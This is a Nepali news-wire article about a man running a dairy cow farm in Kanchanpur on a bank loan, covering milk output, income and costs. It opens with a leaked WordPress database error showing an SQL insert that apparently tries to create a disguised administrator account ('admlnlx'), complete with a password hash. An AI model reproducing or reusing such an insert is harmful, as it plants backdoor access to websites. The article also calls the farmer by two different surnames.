WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdBo9gleSuGhdLsUEBvU0OjO7A9463.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 01:56:36', '', 'admlnlx', 'admlnlx')
कञ्चनपुर, मंसिर २६ –
कञ्चनपुरको भीमदत्तनगरपालिका– २ भासिका मोहनदत्त अवस्थीले बैंकबाट कर्जा लिई व्यावसायिक गाई फार्म सञ्चालन गर्नुभएको छ । बैंकबाट रु १४ लाख कर्जा र आफ्नो रु तीन लाख गरी रु १७ लाखको लागमा जोशीले देवभूमी गाईपालन फार्म सञ्चालन गर्नुभएको हो ।
एक वर्षअघि सञ्चालनमा ल्याइएको गाई फार्मबाट दूध बेचेर उहाँले वार्षिक रु दश लाख भन्दा बढी आम्दानी लिने गर्नुहुन्छ ।
फार्ममा उन्नत नश्लका छवटा जर्सी र पाँचवटा होलेस्टेन जातका गाई छन् । ती गाईबाट प्रति दिन ६० लिटर दूध उत्पादन हुँदै आएको छ ।
“चिसोमा सङ्कलन केन्द्रबाट दुग्ध विकास संस्थानले दूध नउठाउँदा घाटा व्यहोर्नुपर्ने समस्या छ” उहाँले भन्नुभयो । दूध बिक्रीबाट वार्षिक रुपमा आउने रु दश लाखमध्ये रु चार लाख गाईका लागि घाँस र चारोमा खर्चिने, रु एक लाख जती बैंकको ब्याज तिर्न र बाँकी रकम बचत हुने गरेको उहाँले बताउनुभयो ।
भाडामा जग्गा लिई गाईफार्म खोलेका जोशीले वार्षिक रुपमा रु ३५ हजारमा प्रतिवर्ष रु पाँच प्रतिशत भाडा बढ्ने गरी फार्म सञ्चालन गर्दै आउनुभएको हो । विगतमा निर्माण व्यवसायको कार्य गर्दै आएका उहाँले विभिन्न ठाउँका पशुपालकले गाई फार्म खोलेर मनग्य आम्दानी गरेको देख्दा गाईफार्म खोलेर बसेको बताउनुहुन्छ ।
यो पेसमा सन्तुष्ट हुनुभएका उहाँले गाईको मलमूत्र समेत बिक्री गरेर अतिरिक्त आम्दानी समेत लिदै आउनुभएको छ । – रासस